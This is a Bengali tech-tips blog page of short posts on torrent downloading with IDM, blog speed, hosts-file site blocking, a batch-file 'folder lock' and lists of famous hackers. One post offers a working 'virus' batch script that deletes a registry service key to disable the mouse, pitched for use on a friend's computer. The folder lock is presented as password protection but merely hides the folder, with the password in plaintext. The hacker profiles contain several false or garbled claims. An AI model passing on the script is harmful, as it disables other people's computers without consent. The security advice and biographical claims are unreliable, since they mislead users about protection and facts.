Download Torrent File With IDM

Download Torrent File With IDM
                            ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। আজ আমি আপনাদের দেখাবো কিভাবে Torrent ফাইল ডাওনলোড করবেন IDM দিয়ে। Torrent  ফাইল কি এটা আপনারা সবাই জানেন .torrent extension  যুক্ত ফাইল প্রচুর পরিমানে ডাটা ডাওনলোড করার সুবিধা দিয়ে থাকে। আমরা সচরাচর torrent ফাইল ব্যবহার করি বিভিন্ন রকমের মুভি, গেইমস, সফটওয়্যার প্যাকেজ ইত্যাদি ডাওনলোডের জন্য। torrent ফাইল ডাওনলোডের সবচেয়ে বড় অসুবিধা হলো এখানে ডাওনলোড স্পিড খুবই কম এবং স্পিড  লিমিট করে দেয়া থাকে।এই ট্রিক্স টির সাহায্যে আপনি আপনার torrent ফাইলের ডাটা গুলো IDM দিয়ে খুব সহজেই ডাওনলোড করে নিতে পারেন,



How To Download Torrent File With IDM


১। প্রথমে এখানে যান
২। হোমপেইজে আপনার ফাইলটি আপলোড করুন এবং GO তে ক্লিক করুন।
৩। এর পর আপনাকে জিজ্ঞেস করা হবে আপনি কি সুবিধা ফ্রিতে ব্যবহার করতে চান নাকি প্রিমিয়ার,  আপনি ফ্রী চয়েজ করুন।
(নোটঃ ফ্রীতে আপনি ১ জিবি পর্যন্ত ডাওনলোড করতে পারবেন)

 ৪। এখন কিছু সময় লাগবে আপনার ফাইল টি  Cache করতে, এটা হয়ে গেলে Transfer button  এ ক্লিক করুন এখন নিচের মতো কিছু অপশন দেখতে পাবেন,
উপরের চিহ্নিত স্থানে ক্লিক করলেই আপনার ফাইল টি IDM এর মাদ্ধমে ডাওনলোড শুরু হয়ে যাবে। যদি আপনার IDM ইন্সটল করা না থাকে তাহলে সরাসরি ব্রাওজারে ডাওনলোড শুরু হয়ে যাবে।


বিস্তারিত পড়ুন

Reduce Loading Time Of Your Blog

Reduce Loading Time Of Your Blog
                            ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। একটা ওয়েব সাইট এর গুগোল রাঙ্কিং  বাড়াতে চাইলে অবশ্যয় আপনার ওয়েব সাইট এর লোডিং টাইম কমাতে হবে। না হলে  গুগোল আপনাকে কখনোয় তাদের রাঙ্কিং এ তুলবে না। আর আমরা যারা ওয়েব সাইট নিয়ে কাজ করি তারা নিঃস্বয় জানি একটা ওয়েব সাইটের জন্য গুগোল রাঙ্কিং কতটা গুরুত্বপূর্ণ। আপনিও নিঃস্বয় এমন সাইটে ভিজিট করতে চাইবেন না সেটা লোড হতে অনেক সময় নেয়।

ব্লগের লোডিং সময় কমিয়ে আনুন খুব সহজেই,

১। অপ্রয়োজনীয় প্লাগিন দূর করুন।

 আপানার ব্লগ সাইট টিতে কম সংখ্যক প্লাগিং ব্যাবহার করলে  আপনার ব্লগ দেখতে মানানসই  লাগবে ।  আপনি  যত বেশি সংখ্যক প্লাগিং ব্যাবহার করবেন আপনার সাইট তত বেশি স্লো হয়ে যাবে যেটা আপানার ভিজিটর বা গুগোল কারো কাছেই ভালো লাগবে না। তাই কম প্লাগিং ব্যাবহার করুন।

২। ভালো মানের থিম ব্যাবহার করুন। 

আপনি আপনার ব্লগে যে থিম টি ব্যাবহার করবেন সেটা অবশ্যয় অনেক ভাল মানের হতে হবে। কারন অনেক থিম রয়েছে যেগুলো লোডিং হতে অনেক সময় নেয়। আর এই থিম গুলো ব্যাবহার করার আগে অবশ্যয় পরীক্ষা করে দেখুন সেটা কতটা উন্নত। পরীক্ষা করুন এখানে

৩। যতটা সম্ভব কম ইমেজ ব্যাবহার করুন এবং ইমেজ সাইজ কম রাখুন। 

আপনি যত বেশি ইমেজ ব্যাবহার করবেন আপনার সাইটের সাইজ তত বেশি হবে এতে আপনার লোডিং টাইম বেড়ে যাই অনেক। ভালো হয় যদি আপনি ইমেজ কে বিভিন্ন ওয়েব সাইট থেকে লিঙ্কিং করে দেন। তাছাড়া অনেক সফটওয়্যার আসে যেগুলো দিয়ে আপনি আপনার ইমেজের কোয়ালিটি ঠিক রেখে সাইজ কমিয়ে আনতে পারেন।

৪। কাস্টম ফন্টস ব্যাবহার থেকে বিরত থাকুন। 

কাস্টম ফন্টস ব্যাবহারে সাইটকে দেখতে ভাল লাগলেও এত আপনার সাইটকে স্লো করে দেয়। সব সময় সাধারণ ফন্টস গুলোই ব্যাবহার করুন যেমনঃ Arial, Helvetica, Georgia, Verdana, serif, sans-serif Etc... এই ফন্টসগুলো গুলো ব্যাবহারে আপনার সাইটের অপর কোনো বিরুপ প্রভাব পরে না তাছাড়া এর জন্য আপনাকে অতিরিক্ত CSS কিংবা JS ব্যাবহার করতে হয় না।

৫। হোমপেইজ এ বেশি পোস্ট রাখবেন না। 

অনেক থিমেই ডিফল্ট ভাবে ১০ টি পোস্ট করে দেয়া থাকে। আপনি চাইলে ১০ টিই রাখতে পারেন তবে আমার সাজেশন হবে ৭ টির বেশি না রাখা। এতে আপনার সাইট টি আরও বেশি দ্রুত হবে। 
এটি আপনি Layout থেকে করে নিতে পারেন।

৬। অপ্রয়োজনীয় CSS এবং JavaScript কোড মুছে ফেলুন। 

আমি বিশ্বাস করি আপনি ডিফল্ট থিম ব্যবহার করেন না। যদি ডিফল্ট থিম ব্যাবহার না করে থাকেন তাহলে আপনি <b:skin> এর প্রথম দুটি CSS Files মুছে দিতে পারেন কারন এই দুটি অপ্রয়োজনীয়। 
আপনি যদি Google Plus এর কমেন্ট রাখতে না চান তাহলে JS এর তৃতীয় এবং চতুর্থ ফাইল মুছে ফেলতে পারেন। ( এটা করার আগে অবশ্যয় টেম্পলেট এর একটা ব্যাকআপ করে রাখবেন)

৭। IFrame এবং JavaScript এর দ্বারা বিজ্ঞাপন দিবেন না। 

 JavaScript এবং Iframe এর বিজ্ঞাপন লোডিং হতে অনেক সময় লাগে। যদিও এটা আপনার আয়ের একটা ভালো উৎস । তাই খুব বেশি  JavaScript এবং Iframe এর বিজ্ঞাপন আপনার সাইটে ব্যবহার করবেন না।
বিস্তারিত পড়ুন

Block Facebook And Any Website In Your Computer

Block Facebook And Any Website In Your Computer
                     ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। আজ আপনাদের যে Tutorial টি দেখাবো  কিভাবে যেকোনো ওয়েব সাইট কে আপনার কম্পিউটার থেকে ব্লক করবেন? আমার মনে হয় এটা আপনার জন্য অনেক টা হেল্পফুল হবে। যদি আপনি চান আপনার কম্পিউটার কে নির্দিষ্ট কোনো ওয়েব সাইট হতে দূরে রাখতে কিংবা কোনো সাইট কে সরাসরি ব্লক করে রাখতে তাহলে আপনাকে নিচের পদ্ধতি গুলো অনুসরণ করতে হবে, চলুন তাহলে দেখা যাক।

How To Block Facebook In Your Computer?



১। আপানার Notepad/Notepad++ টিকে Administrator ModeOpen করুন,
২। নিচের ফোল্ডার থেকে Host ফাইল কে  Notepad/Notepad++ দিয়ে Open করুন,

       "  C:\WINDOWS\system32\drivers\etc " 

৩। Notepad/Notepad++ এর নিচে লেখা গুলো Paste করুন,   127.0.0.1 Localhost 


        Localhost এর জায়গায় আপনি যে সাইট টি ব্লক করতে চান সেটা দিন।
যেমনঃ 
       127.0.0.1 google.com
       127.0.0.1 www.fecebook.com
       127.0.0.1 apps.facebook.com
       127.0.0.1 somethong.com


৪। সবশেষে Host ফাইলটি Save করুন।
৫। এবার আপনার কম্পিউটারের যেকোনো ব্রাওজার দিয়ে ব্লক করা সাইট গুলো ওপেন করার চেষ্টা করুন হবে না। আর যদি কোনো সমস্যায় পরেন আমাকে জানাবেন সমাধান দেওয়ার চেষ্টা করবো ইনশাআল্লাহ্‌ ।
বিস্তারিত পড়ুন

Top 6 White Hat Hackers In The World

Top 6 White Hat Hackers In The World
                              ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। হ্যাকার কাকে বলে এটা বলে আর সময় নষ্ট করবো না এটা সবাই জানে। হ্যাকার প্রধানত দু প্রকার BLACK HAT AND WHITE HAT হ্যাকার,  কিন্তু আমি আজ WHITE HAT হ্যাকার সম্পর্কে জানাবো।

যারা কোনো কিছু হ্যাক করে তাতে অন্যর ভালো করে বা ভালো কাজে ব্যাবহার করে তাদের হোয়াইট হ্যাট হ্যাকার বলে।

এবং যারা হ্যাক জিনিস টাকে  খারাপ কাজে ব্যাবহার করে তাদের BLACK HAT  হ্যাকার বলে।

Top 6 White Hat Hackers:

 


Tim Berners-Lee

 

 এই মানুষটির অবদান বিশ্ববাসী কখনই ভুলতে পারবে না। এবং আপনি নিজেও চাইলে ইনার অবদান অস্বীকার করতে পারবেন না। কারন আমরা বর্তমানে যে Web ব্যাবহার করছি  এটা তিনারি আবিষ্কার। World Wild Web এর  কথাই বলছি যেটা তিনি না থাকলে হয়তো আমরা আজ পেতাম না। 


Stephen Wozniak

 

বিশ্বের অর্ধেক এর বেশি White Hat Hacker গন  Stephen Wozniak কে গুরু হিসাবে মানে। ইনাকে Apple এরও অর্ধেক বলা হয়। APPLE এ Steve Jobs এর পরেই যার অবদান তিনিই  Stephen Wozniak. তিনি বহু মানুষের মনে  আগ্রহর জন্ম দিয়েছেন কম্পিউটার সম্পর্কে জানার। এই মানুষটি নিজেও কখনো কম্পিউটারের প্রতি বিন্দুমাত্র আগ্রহ হারিয়ে ফেলেন নি। ইনাকে বেশির ভাগ মানুষ Woz নামেই ডেকে থাকেন।

Linus  Torvalds 

 

বিশ্ববিখ্যাত Linux Operating System এর জনক এই Linus Trovals । তিনি সারাজীবন চেয়েছিলেন কম্পিউটার কে মজার বস্তু বানাতে এবং তিনি Linux এর মাধ্যমে সফলতাও পেয়েসেন। Linux  কে প্রথমে Freak নামে ডাকা হতো কারন তখন এটা দুটি শব্দের কম্বিনেশনে চলতো একটা "Free" অন্যটি "Freak" পরবর্তীতে তার  নামানুসারে এটাকে Linux নামে ডাকা  হয়।

Tsutomu Shimomura

 

White Hat Hackar এর বিশাল একটা উদাহরণ বলা চলে এই Tsutomu Shimomura  কে। Tsutomu Shimomura  Kevin Minitect এর বিভিন্ন রকমের খারাপ কর্মকাণ্ড নস্যাৎ করে দেন। Kevin Mitnick কে কম্পিউটার ক্রিমিনাল বলে ডাকা হয়। Tsutomu Shimomura বর্তমানে Neofocal System এর CEO এবং CTO হিসাবে কর্মরত রয়েছেন।

Richard Matthew Stallman  

 

Richard Matthew Stallman কে মজা করে সংক্ষেপে RMS নামে ডাকা হয়। তিনি সবসময় সফটওয়্যার ব্যাবহারের স্বাধীনতা দিতে চেয়েছেন  সেটা শিক্ষাক্ষেত্রে, এবং ব্যাবহার কারীর ইচ্ছা মতো সফটওয়্যার পছন্দ দের বেলাতেও। তিনি NSU তে বর্তমানে চাকুরীরত রয়েছেন যেটা একটি ফ্রী সফটওয়্যার ডেভেলপমেন্ট প্রতিষ্ঠান। 

Johanna Rutkowska


প্রযুক্তি অথবা কম্পিউটার সম্পর্কে যখনই   বলা হয় আমরা পুরুষদেরই উল্লেখ করে থাকি। আজ জানবো প্রজুক্তিতে মেয়েদের অবদানও কম না। ওপরে যে মহিলা টিকে দেখছেন ইনি Johanna Rutkowska । এই মহিলা টি  RootKits Virus কে লুকিয়ে রাখতে পারে সফটওয়্যার এর মাঝে। এটা আপনার কম্পিউটার এর জন্য প্রয়োজনীয় তবে মজার ব্যাপার আপনার Anti Virus এটাকে ধরতে পারে না।
বিস্তারিত পড়ুন

Password Protect Folder Without Any Software

Password Protect Folder Without Any Software
                       ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

 সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। আমার আগের পোস্টটি ছিলো একটা ভাইরাস বানানো সম্পর্কে। আজ শিখাবো কিভাবে Password Protect করবেন Any Folder কোনো সফটওয়্যার ছাড়াই। এই পদ্ধতি টা শুধু Win XP, Win 7 এ পরীক্ষা করেছি, আপনি চাইলে অন্য গুলো তেও করতে পারেন। 

How To Lock Folder ?


১। NotePad ওপেন করুন এবং নিচের কোড টি কপি করুন,

cls
@ECHO OFF
title sovvomanus.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== sovvomanus goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End


২। ফাইলটি Save Asথেকে Lock.bat নাম দিয়ে Save করুন। 
৩। ফাইল টিতে ডাবল ক্লিক করলে New Folder  নামে একটা ফোল্ডার তৈরি হয়ে যাবে।
৪। আপনি যে ফাইল গুলো  Password Protect করতে চান সেগুলো এই ফোল্ডারে কপি করুন।
৫। এখন  Folder টি Hide হয়ে যাবে।
৬। এবার ফাইল গুলো ফিরে পেতে Lock.bat এ Double Click  করে Password দিন, ( যদিও আমি Default ভাবে password দিয়ে রেখেছি sovvomanus) আপনি চাইলেই এটা পরিবর্তন করতে পারেন।

বিস্তারিত পড়ুন

Disable Any Mouse By A Virus That You Simply Make

Disable Any Mouse By A  Virus That You Simply  Make
                      ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

 সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। যদিও এরকম পোস্ট এর আগে করি নাই। আজ আপনাকে একটা ভাইরাস বানানো শিখাবো যার মাধ্যমে আপনি আপনার অথবা আপনার বন্ধুর মাউস ডিসাবল করে দিতে পারেন খুব সহজেই। এটা কিন্তু আপনার মাউস কে ডিসাবল করে দিবে তাই নিজে এটা করার আগে একবার ভেবে নিন। পরে আমাকে গালি দিয়েন না।

How To Disable Mouse?


১। NotePad ওপেন করুন এবং নিচের কোড টি কপি করুন,

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

২। ফাইলটি Save Asথেকে Virus.bat নাম দিয়ে Save করুন। 
৩। আপনার ভাইরাস টি বানানো কমপ্লিট।
বিস্তারিত পড়ুন

Top 5 Black Hat Hackers In The World

Top 5 Black Hat Hackers In The World
                             ————————–— بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ ————————–—

সবাইকে আমার আন্তরিক সালাম এবং শুভেচ্ছা জানিয়ে শুরু করছি। হ্যাকার কাকে বলে এটা বলে আর সময় নষ্ট করবো না এটা সবাই জানে। হ্যাকার প্রধানত দু প্রকার BLACK HAT AND WHITE HAT হ্যাকার,  কিন্তু আমি আজ BLACK HAT হ্যাকার সম্পর্কে জানাবো।

যারা কোনো কিছু হ্যাক করে তাতে অন্যর ভালো করে বা ভালো কাজে ব্যাবহার করে তাদের হোয়াইট হ্যাট হ্যাকার বলে।

এবং যারা হ্যাক জিনিস টাকে  খারাপ কাজে ব্যাবহার করে তাদের BLACK HAT  হ্যাকার বলে।

Top 5 Black Hat Hackers:


George Hotz

George Hotz এর বয়স যখন ১৭ তখন সে Sony  এবং Iphone কোম্পানিকে হ্যাক করে বিশ্বে বড় রকমের তোলপাড় তুলে দেয়। এবং নিজের যোগ্যতা সম্পর্কে জানিয়ে দেয় বিশ্ব বাসীকে।

 

 

Kevin Mitnick

Kevin Mitnick কে কম্পিউটার ক্রিমিনাল বলে ডাকা হয়। হাই স্কুলে পরার সময় সে হ্যাকিং শুরু করে। এবং কয়েক বসরের মধ্যেই তিনি ডজন খানিক কোম্পানি কে হ্যাক করে ফেলেন। তিনি ১৯৯৫ সালের দিকে গ্রেপ্তার হন।

 

 

Adrian Lamo

একুশ শতকের সবচেয়ে বুদ্ধিমান এবং কার্যকরী হ্যাকার বলে ডাকা হয় Adrian Lamo কে। তিনি বড় রকমের ২ টি কম্পিউটার নেটওয়ার্ক হ্যাকিং এর মাধ্যমে রাতারাতি বিখ্যাত হয়ে পরেন। তিনি ২০০৩ সালের দিকে গ্রেপ্তার হন।

 

 

Gary McKinnon 

Gary McKinnon একসাথে ৯৭ টি United States military এর কম্পিউটার এবং নাসার কম্পিউটার হ্যাক করেন। এর মাধ্যমে তিনি সরকারের শত্রু তে পরিনত হয়ে যান। তিনি ২০০২ সালের দিকে পুলিশের হাতে গ্রেপ্তার হন।

Jonathan James

 Jonathan James এর জীবন ছিলো খুবই ছোট কিন্তু অনেক উজ্জ্বল। তিনি ১৯৯৯ সালের দিকে যখন তার বয়স ছিলো ১৫ তখন তিনি একসাথে ২ টি স্কুলের নেটওয়ার্ক সিস্টেম হ্যাক করে ফেলেন। Jonathan James নাসার ও সিস্টেম হ্যাক করেন যার জন্য নাসা কে $৪১০০০ গুনতে হয়। 
বিস্তারিত পড়ুন